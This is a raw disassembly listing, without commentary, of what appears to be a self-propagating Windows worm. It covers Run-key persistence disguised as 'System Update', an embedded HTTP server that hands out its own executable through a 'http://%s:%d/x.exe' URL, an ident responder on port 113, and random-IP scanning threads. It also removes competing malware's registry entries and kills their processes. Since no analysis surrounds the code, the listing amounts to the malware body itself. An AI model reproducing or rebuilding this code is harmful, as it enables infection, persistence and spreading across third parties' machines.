push [esp+arg_0]
push 0
push 2
call dword_315010DC
test eax, eax
jz short locret_31501A61
push eax
call dword_315010D8
locret_31501A61: ; CODE XREF: sub_31501A48+10�j
retn
sub_31501A48 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501A62 proc near ; DATA XREF: sub_31501BA8+127�o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_100]
push edi
push 100h
push eax
push ebx
call dword_315011A0
cmp eax, 0FFFFFFFFh
jnz short loc_31501A93
push 1
jmp loc_31501B4E
; ---------------------------------------------------------------------------
loc_31501A93: ; CODE XREF: sub_31501A62+28�j
mov esi, dword_31501120
lea eax, [ebp+var_100]
push offset aGet ; "GET"
push eax
call esi
pop ecx
test eax, eax
pop ecx
jz loc_31501B5E
lea eax, [ebp+var_100]
push offset a_exe ; ".exe"
push eax
call esi
pop ecx
test eax, eax
pop ecx
jz loc_31501B5E
mov esi, dword_3150119C
push 0
push 3Dh
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
push ebx
call esi
push ds:dword_31506160
lea eax, [ebp+var_200]
push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
push eax
call dword_3150113C
add esp, 0Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_31503A3E
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push ebx
call esi
loc_31501B10: ; CODE XREF: sub_31501A62+E8�j
mov eax, ds:dword_31506160
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_31501B22
mov eax, ecx
loc_31501B22: ; CODE XREF: sub_31501A62+BC�j
test eax, eax
jz short loc_31501B51
push 0
push eax
mov eax, ds:dword_31506158
add eax, edi
push eax
push ebx
call esi
cmp eax, 0FFFFFFFFh
jz short loc_31501B4C
cmp eax, 1000h
jb short loc_31501B51
push 64h
add edi, eax
call dword_315010A4
jmp short loc_31501B10
; ---------------------------------------------------------------------------
loc_31501B4C: ; CODE XREF: sub_31501A62+D5�j
push 2
loc_31501B4E: ; CODE XREF: sub_31501A62+2C�j
pop eax
jmp short loc_31501BA1
; ---------------------------------------------------------------------------
loc_31501B51: ; CODE XREF: sub_31501A62+C2�j
; sub_31501A62+DC�j
push offset dword_3150615C
call dword_315010E4
jmp short loc_31501B7C
; ---------------------------------------------------------------------------
loc_31501B5E: ; CODE XREF: sub_31501A62+49�j
; sub_31501A62+61�j
mov esi, dword_3150119C
push 0
push 15h
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
push ebx
call esi
push 0
push 3
push offset dword_31505A84
push ebx
call esi
loc_31501B7C: ; CODE XREF: sub_31501A62+FA�j
push 7D0h
call dword_315010A4
push 2
push ebx
call dword_315011A4
push ebx
call dword_315011A8
push 0
call dword_315010E0
xor eax, eax
loc_31501BA1: ; CODE XREF: sub_31501A62+ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_31501A62 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501BA8 proc near ; DATA XREF: sub_31501D96+14B�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_315018BA
lea eax, [ebp+var_130]
push 104h
push eax
push offset aSystemUpdate ; "System Update"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov ds:dword_3150615C, ebx
call sub_315023E4
add esp, 14h
test eax, eax
jnz loc_31501CDD
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_315010F0
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31501C14
push 1
call dword_315010E0
loc_31501C14: ; CODE XREF: sub_31501BA8+62�j
push ebx
push esi
call dword_315010EC
push eax
mov ds:dword_31506160, eax
call sub_31502800
pop ecx
mov ds:dword_31506158, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push ds:dword_31506160
push eax
push esi
call dword_315010E8
mov eax, [ebp+var_4]
push esi
mov ds:dword_31506160, eax
call dword_315010BC
push ebx
push 1
push 2
call dword_3150118C
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_31503A38
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_31501C76: ; CODE XREF: sub_31501BA8+E5�j
; sub_31501BA8+ED�j ...
call dword_31501124
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov ds:dword_3150618C, eax
jz short loc_31501C76
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_31501C76
push eax
call dword_31501194
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_31501170
test eax, eax
jnz short loc_31501C76
push 64h
push edi
call dword_31501174
mov [ebp+var_8], esi
pop esi
loc_31501CBF: ; CODE XREF: sub_31501BA8+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_31501178
push eax
push offset sub_31501A62
call sub_31501911
pop ecx
pop ecx
jmp short loc_31501CBF
; ---------------------------------------------------------------------------
loc_31501CDD: ; CODE XREF: sub_31501BA8+3D�j
push ebx
call dword_315010E0
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_31501BA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501CEC proc near ; CODE XREF: sub_31501D96:loc_31501EB6�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_3150116C
push eax
push 2
call esi
lea eax, [ebp+var_190]
push eax
push 102h
call esi
pop esi
leave
retn
sub_31501CEC endp
; ---------------------------------------------------------------------------
loc_31501D18: ; CODE XREF: UPX1:31508558�j
push 0
call dword_315010C4
push offset aFtpupd_exe ; "ftpupd.exe"
mov ds:dword_31506190, eax
call dword_31501094
call sub_315018BA
push offset aUterm13_2i ; "uterm13.2i"
call sub_315018E8
pop ecx
mov ds:dword_31506164, eax
call dword_31501098
cmp eax, 0B7h
jnz short loc_31501D5A
push 1
call dword_3150109C
loc_31501D5A: ; CODE XREF: UPX0:31501D50�j
call sub_31501727
call sub_31502548
call sub_315026C2
push offset sub_31501D96
call sub_315017AF
test eax, eax
pop ecx
jz short loc_31501D7F
push 0
call sub_31501D96
loc_31501D7F: ; CODE XREF: UPX0:31501D76�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_31501D82 proc near ; CODE XREF: sub_31501D96:loc_31501F04�p
; sub_315020C4:loc_315020DD�p ...
push 0
push ds:dword_31506168
call dword_31501090
neg eax
sbb eax, eax
inc eax
retn
sub_31501D82 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501D96 proc near ; CODE XREF: UPX0:31501D7A�p
; DATA XREF: UPX0:31501D69�o
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_315011B0
push offset loc_31503A80
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
push offset aU13_2ix ; "u13.2ix"
xor edi, edi
push edi
push 1
push edi
call dword_3150108C
mov ds:dword_31506168, eax
mov [ebp+var_4], edi
push offset aU10x ; "u10x"
call sub_31501A48
mov [esp+8+var_8], offset aU11x ; "u11x"
call sub_31501A48
mov [esp+8+var_8], offset aU12x ; "u12x"
call sub_31501A48
mov [esp+8+var_8], offset aU13x ; "u13x"
call sub_31501A48
mov [esp+8+var_8], offset aU13ix ; "u13ix"
call sub_31501A48
mov [esp+8+var_8], offset aU8 ; "u8"
call sub_315018E8
mov [esp+8+var_8], offset aU9 ; "u9"
call sub_315018E8
mov [esp+8+var_8], offset aU10 ; "u10"
call sub_315018E8
mov [esp+8+var_8], offset aU11 ; "u11"
call sub_315018E8
mov [esp+8+var_8], offset aU12 ; "u12"
call sub_315018E8
mov [esp+8+var_8], offset aU13 ; "u13"
call sub_315018E8
mov [esp+8+var_8], offset aU13i ; "u13i"
call sub_315018E8
mov [esp+8+var_8], offset aU13_2i ; "u13.2i"
call sub_315018E8
mov [esp+8+var_8], offset aU14 ; "u14"
call sub_315018E8
pop ecx
cmp [ebp+arg_0], edi
jz short loc_31501EB6
push offset aWs2_32 ; "ws2_32"
mov esi, dword_315010B4
call esi
push offset aWininet ; "wininet"
call esi
push offset aMsvcrt ; "msvcrt"
call esi
push offset aAdvapi32 ; "advapi32"
call esi
push offset aUser32 ; "user32"
call esi
push offset aUterm13_2i ; "uterm13.2i"
call sub_315018E8
pop ecx
mov ds:dword_31506164, eax
loc_31501EB6: ; CODE XREF: sub_31501D96+E5�j
call sub_31501CEC
push edi
push offset sub_31501F6B
call sub_31501911
pop ecx
pop ecx
push 1F4h
mov esi, dword_315010A4
call esi
push edi
push offset loc_31503408
call sub_315018F7
push edi
push offset sub_31501BA8
call sub_315018F7
push edi
push offset sub_31502BE8
call sub_315018F7
push edi
push offset loc_315022D3
call sub_315018F7
add esp, 20h
loc_31501F04: ; CODE XREF: sub_31501D96+185�j
call sub_31501D82
test eax, eax
jnz short loc_31501F1D
push edi
call dword_31501038
push 1388h
call esi
jmp short loc_31501F04
; ---------------------------------------------------------------------------
loc_31501F1D: ; CODE XREF: sub_31501D96+175�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_31501D96 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_31501F3A proc near ; CODE XREF: sub_31501F6B+F9�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
push edi
call sub_31503A3E
test eax, eax
pop ecx
jbe short loc_31501F68
loc_31501F4D: ; CODE XREF: sub_31501F3A+2C�j
mov al, [esi+edi]
cmp al, 0Ah
jz short loc_31501F58
cmp al, 0Dh
jnz short loc_31501F5C
loc_31501F58: ; CODE XREF: sub_31501F3A+18�j
and byte ptr [esi+edi], 0
loc_31501F5C: ; CODE XREF: sub_31501F3A+1C�j
push edi
inc esi
call sub_31503A3E
cmp esi, eax
pop ecx
jb short loc_31501F4D
loc_31501F68: ; CODE XREF: sub_31501F3A+11�j
pop edi
pop esi
retn
sub_31501F3A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501F6B proc near ; DATA XREF: sub_31501D96+126�o
var_154 = dword ptr -154h
var_148 = byte ptr -148h
var_48 = byte ptr -48h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 148h
push ebx
mov [ebp+var_8], esp
call sub_315018BA
call dword_31501124
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_48]
add edx, 3
push edx
push eax
call sub_31501932
lea eax, [ebp+var_48]
mov ebx, offset dword_3150616C
push eax
push ebx
call sub_31503A8C
add esp, 10h
mov [ebp+var_4], 10h
push 0
push 1
push 2
call dword_3150118C
push 0
mov [ebp+var_8], eax
mov [ebp+var_18], 2
call dword_31501168
push 71h
mov [ebp+var_14], eax
call dword_31501194
push [ebp+var_4]
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push eax
push [ebp+var_8]
call dword_31501170
test eax, eax
jz short loc_31501FF7
push 1
pop eax
loc_31501FF2: ; CODE XREF: sub_31501F6B+A2�j
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_31501FF7: ; CODE XREF: sub_31501F6B+82�j
push esi
push edi
push 5
push [ebp+var_8]
call dword_31501174
test eax, eax
jz short loc_3150200F
push 1
pop eax
pop edi
pop esi
jmp short loc_31501FF2
; ---------------------------------------------------------------------------
loc_3150200F: ; CODE XREF: sub_31501F6B+9B�j
mov edi, dword_315010A4
loc_31502015: ; CODE XREF: sub_31501F6B+C6�j
; sub_31501F6B+E8�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_28]
push eax
push [ebp+var_8]
call dword_31501178
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31502033
push 64h
call edi
jmp short loc_31502015
; ---------------------------------------------------------------------------
loc_31502033: ; CODE XREF: sub_31501F6B+C0�j
push 0
lea eax, [ebp+var_148]
push 100h
push eax
push esi
call dword_315011A0
test eax, eax
jnz short loc_31502055
loc_3150204C: ; CODE XREF: sub_31501F6B+157�j
push esi
call dword_315011A8
jmp short loc_31502015
; ---------------------------------------------------------------------------
loc_31502055: ; CODE XREF: sub_31501F6B+DF�j
and [ebp+eax+var_148], 0
lea eax, [ebp+var_148]
push eax
call sub_31501F3A
lea eax, [ebp+var_148]
mov [esp+154h+var_154], offset aUseridUnix ; " : USERID : UNIX : "
push eax
call sub_31503A86
lea eax, [ebp+var_148]
push ebx
push eax
call sub_31503A86
lea eax, [ebp+var_148]
push offset asc_31505B8C ; "\r\n"
push eax
call sub_31503A86
add esp, 18h
lea eax, [ebp+var_148]
push 0
push eax
call sub_31503A3E
pop ecx
push eax
lea eax, [ebp+var_148]
push eax
push esi
call dword_3150119C
push 1388h
call edi
jmp short loc_3150204C
sub_31501F6B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315020C4 proc near ; DATA XREF: sub_31502128+55�o
; sub_315021B0+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_315020D3
push 1
pop eax
jmp short locret_31502124
; ---------------------------------------------------------------------------
loc_315020D3: ; CODE XREF: sub_315020C4+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
push esi
mov [ebp+var_1], al
xor bl, bl
loc_315020DD: ; CODE XREF: sub_315020C4+5A�j
call sub_31501D82
test eax, eax
jnz short loc_31502120
call sub_31501A32
test eax, eax
jz short loc_31502120
cmp [ebp+var_1], bl
jz short loc_31502119
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_315011C0
movzx esi, ds:word_3150619C
pop ecx
call dword_31501124
cdq
idiv esi
add edx, esi
push edx
call dword_315010A4
loc_31502119: ; CODE XREF: sub_315020C4+2E�j
inc bl
cmp bl, 0FFh
jb short loc_315020DD
loc_31502120: ; CODE XREF: sub_315020C4+20�j
; sub_315020C4+29�j
pop esi
xor eax, eax
pop ebx
locret_31502124: ; CODE XREF: sub_315020C4+D�j
leave
retn 4
sub_315020C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502128 proc near ; DATA XREF: sub_315021B0+7E�o
; UPX0:31502365�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_31502136
push 1
pop eax
jmp short loc_315021AC
; ---------------------------------------------------------------------------
loc_31502136: ; CODE XREF: sub_31502128+7�j
push ebx
push esi
push edi
call sub_315018BA
mov esi, dword_31501124
xor ebx, ebx
loc_31502146: ; CODE XREF: sub_31502128+7D�j
call sub_31501D82
test eax, eax
jnz short loc_315021A7
call sub_31501A32
test eax, eax
jz short loc_315021A7
call esi
mov byte ptr [ebp+arg_0+2], al
call esi
push offset dword_31506194
mov byte ptr [ebp+arg_0+3], al
call dword_315010E4
push [ebp+arg_0]
call sub_315011C0
test eax, eax
pop ecx
jnz short loc_31502189
push [ebp+arg_0]
push offset sub_315020C4
call sub_31501911
pop ecx
pop ecx
loc_31502189: ; CODE XREF: sub_31502128+50�j
movzx edi, ds:word_3150619C
call esi
cdq
idiv edi
add edx, edi
push edx
call dword_315010A4
inc ebx
cmp ebx, 8000h
jl short loc_31502146
loc_315021A7: ; CODE XREF: sub_31502128+25�j
; sub_31502128+2E�j
pop edi
pop esi
xor eax, eax
pop ebx
loc_315021AC: ; CODE XREF: sub_31502128+C�j
pop ebp
retn 4
sub_31502128 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315021B0 proc near ; DATA XREF: UPX0:3150237D�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_315018BA
call sub_31501D82
test eax, eax
jnz loc_31502269
push ebx
mov ebx, dword_315010A4
push esi
mov esi, dword_31501124
push edi
loc_315021D6: ; CODE XREF: sub_315021B0+48�j
; sub_315021B0+B0�j
call esi
mov byte ptr [ebp+var_4+1], al
call esi
mov byte ptr [ebp+var_4+3], al
call esi
mov byte ptr [ebp+var_4+2], al
loc_315021E5: ; CODE XREF: sub_315021B0+3C�j
call esi
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_315021E5
call sub_315019F3
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_315021D6
call sub_31501A32
test eax, eax
jz short loc_31502241
push offset dword_31506194
call dword_315010E4
push edi
call sub_315011C0
test eax, eax
pop ecx
jnz short loc_31502248
push edi
push offset sub_315020C4
call sub_31501911
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_3150222D: ; CODE XREF: sub_315021B0+8D�j
push edi
push offset sub_31502128
call sub_31501911
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_3150222D
jmp short loc_31502248
; ---------------------------------------------------------------------------
loc_31502241: ; CODE XREF: sub_315021B0+51�j
push 2710h
call ebx
loc_31502248: ; CODE XREF: sub_315021B0+67�j
; sub_315021B0+8F�j
movzx edi, ds:word_3150619C
call esi
cdq
idiv edi
add edx, edi
push edx
call ebx
call sub_31501D82
test eax, eax
jz loc_315021D6
pop edi
pop esi
pop ebx
loc_31502269: ; CODE XREF: sub_315021B0+11�j
push 0
call dword_315010E0
xor eax, eax
leave
retn 4
sub_315021B0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502277 proc near ; CODE XREF: UPX0:loc_3150233E�p
; UPX0:loc_315023A8�p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
push ebp
mov ebp, esp
sub esp, 50h
push esi
call sub_315019F3
push eax
call dword_31501190
mov esi, dword_31501088
push eax
lea eax, [ebp+var_28]
push eax
call esi
push ds:dword_3150618C
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_50]
push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
push eax
call dword_3150113C
add esp, 10h
lea eax, [ebp+var_50]
push eax
push offset word_31505002
call esi
push offset byte_31505000
call dword_315010A0
mov byte_31505000[eax], 0DFh
pop esi
leave
retn
sub_31502277 endp
; ---------------------------------------------------------------------------
loc_315022D3: ; DATA XREF: sub_31501D96+161�o
push ecx
push ecx
push ebx
push ebp
push esi
xor ebp, ebp
push edi
mov ds:dword_31506194, ebp
call sub_31501A32
mov esi, dword_315010A4
mov edi, 1388h
test eax, eax
jnz short loc_31502301
loc_315022F5: ; CODE XREF: UPX0:315022FF�j
push edi
call esi
call sub_31501A32
test eax, eax
jz short loc_315022F5
loc_31502301: ; CODE XREF: UPX0:315022F3�j
lea eax, [esp+14h]
push ebp
push eax
call dword_3150115C
test byte ptr [esp+14h], 2
push 50h
mov ds:dword_31506198, ebp
pop ebx
mov ds:word_3150619C, 96h
jz short loc_3150233E
mov ds:dword_31506198, 1
mov ebx, 15Eh
mov ds:word_3150619C, 14h
loc_3150233E: ; CODE XREF: UPX0:31502324�j
call sub_31502277
mov ebp, [esp+14h]
cmp ebp, 100007Fh
jz short loc_3150235C
push ebp
push offset sub_315020C4
call sub_31501911
pop ecx
pop ecx
loc_3150235C: ; CODE XREF: UPX0:3150234D�j
mov dword ptr [esp+10h], 4
loc_31502364: ; CODE XREF: UPX0:31502375�j
push ebp
push offset sub_31502128
call sub_31501911
dec dword ptr [esp+18h]
pop ecx
pop ecx
jnz short loc_31502364
test ebx, ebx
jle short loc_3150238C
loc_3150237B: ; CODE XREF: UPX0:3150238A�j
push 0
push offset sub_315021B0
call sub_31501911
pop ecx
dec ebx
pop ecx
jnz short loc_3150237B
loc_3150238C: ; CODE XREF: UPX0:31502379�j
; UPX0:31502398�j ...
call sub_31501A32
test eax, eax
jz short loc_3150239A
push edi
call esi
jmp short loc_3150238C
; ---------------------------------------------------------------------------
loc_3150239A: ; CODE XREF: UPX0:31502393�j
; UPX0:315023A6�j
call sub_31501A32
test eax, eax
jnz short loc_315023A8
push edi
call esi
jmp short loc_3150239A
; ---------------------------------------------------------------------------
loc_315023A8: ; CODE XREF: UPX0:315023A1�j
call sub_31502277
jmp short loc_3150238C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315023AF proc near ; CODE XREF: sub_31502548+8C�p
; sub_315026C2+11A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3150102C
test eax, eax
jnz short loc_315023E2
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31501030
push [ebp+arg_4]
call dword_31501034
loc_315023E2: ; CODE XREF: sub_315023AF+1C�j
pop ebp
retn
sub_315023AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315023E4 proc near ; CODE XREF: sub_31501BA8+33�p
; sub_31502548+7D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3150102C
test eax, eax
jz short loc_31502410
push 1
pop eax
jmp short loc_3150243A
; ---------------------------------------------------------------------------
loc_31502410: ; CODE XREF: sub_315023E4+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_31501028
test eax, eax
jz short loc_3150242F
push 2
pop esi
loc_3150242F: ; CODE XREF: sub_315023E4+46�j
push [ebp+arg_10]
call dword_31501034
mov eax, esi
loc_3150243A: ; CODE XREF: sub_315023E4+2A�j
pop esi
leave
retn
sub_315023E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150243D proc near ; CODE XREF: sub_315025F6+96�p
; sub_315026C2+7C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31501020
test eax, eax
jz short loc_31502466
push 1
pop eax
jmp short loc_3150248D
; ---------------------------------------------------------------------------
loc_31502466: ; CODE XREF: sub_3150243D+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31501024
test eax, eax
jz short loc_31502482
push 2
pop esi
loc_31502482: ; CODE XREF: sub_3150243D+40�j
push [ebp+arg_4]
call dword_31501034
mov eax, esi
loc_3150248D: ; CODE XREF: sub_3150243D+27�j
pop esi
pop ebp
retn
sub_3150243D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502490 proc near ; CODE XREF: sub_31502548+98�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_315010A0
mov esi, eax
dec esi
test esi, esi
jle loc_31502544
loc_315024B0: ; CODE XREF: sub_31502490+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_315024B9
dec esi
jns short loc_315024B0
loc_315024B9: ; CODE XREF: sub_31502490+24�j
push 0
push 2
call sub_31503ABC
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_31502544
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_31503A38
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_31503AB6
test eax, eax
jz short loc_31502544
lea esi, [esi+ebx+1]
loc_31502501: ; CODE XREF: sub_31502490+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_31501120
pop ecx
test eax, eax
pop ecx
jz short loc_31502531
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_315010C0
push 0
push eax
call dword_31501080
loc_31502531: ; CODE XREF: sub_31502490+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_31503AB0
test eax, eax
jnz short loc_31502501
loc_31502544: ; CODE XREF: sub_31502490+1A�j
; sub_31502490+38�j ...
pop esi
pop ebx
leave
retn
sub_31502490 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502548 proc near ; CODE XREF: UPX0:31501D5F�p
var_138 = byte ptr -138h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 138h
push ebx
push esi
lea eax, [ebp+var_30]
push edi
mov [ebp+var_30], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_2C], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_28], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_24], offset aBotLoader ; "Bot Loader"
mov [ebp+var_20], offset aSystray ; "SysTray"
mov [ebp+var_1C], offset aWinupdate ; "WinUpdate"
mov [ebp+var_18], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_14], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_10], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_C], offset aMsConfigV13 ; "MS Config v13"
mov [ebp+var_4], eax
mov [ebp+var_8], 0Ah
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_315025B1: ; CODE XREF: sub_31502548+A7�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_138]
push eax
push ebx
push edi
push esi
call sub_315023E4
add esp, 14h
test eax, eax
jnz short loc_315025E8
push ebx
push edi
push esi
call sub_315023AF
lea eax, [ebp+var_138]
push eax
call sub_31502490
add esp, 10h
loc_315025E8: ; CODE XREF: sub_31502548+87�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_315025B1
pop edi
pop esi
pop ebx
leave
retn
sub_31502548 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315025F6 proc near ; CODE XREF: sub_315026C2+D1�p
; sub_315026C2+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_3150260B
push [ebp+arg_0]
call dword_31501094
loc_3150260B: ; CODE XREF: sub_315025F6+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_31501068
test eax, eax
jz locret_315026C0
push esi
call dword_31501124
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_31501932
mov esi, dword_3150106C
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset a_exe ; ".exe"
push eax
call esi
lea eax, [ebp+var_78]
push offset asc_31505CF0 ; "\\"
push eax
call esi
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_31501070
lea eax, [ebp+var_78]
push eax
call dword_315010A0
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aSystemUpdate ; "System Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_3150243D
add esp, 14h
push ds:dword_31506164
call dword_315010BC
lea eax, [ebp+var_78]
push 0
push eax
call dword_31501074
push 1F4h
call dword_315010A4
push 0
call dword_3150109C
pop esi
locret_315026C0: ; CODE XREF: sub_315025F6+23�j
leave
retn
sub_315025F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315026C2 proc near ; CODE XREF: UPX0:31501D64�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_31501060
test eax, eax
jz loc_315027FB
and ds:dword_315061A0, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_315023E4
add esp, 14h
test eax, eax
jz short loc_31502748
call dword_31501124
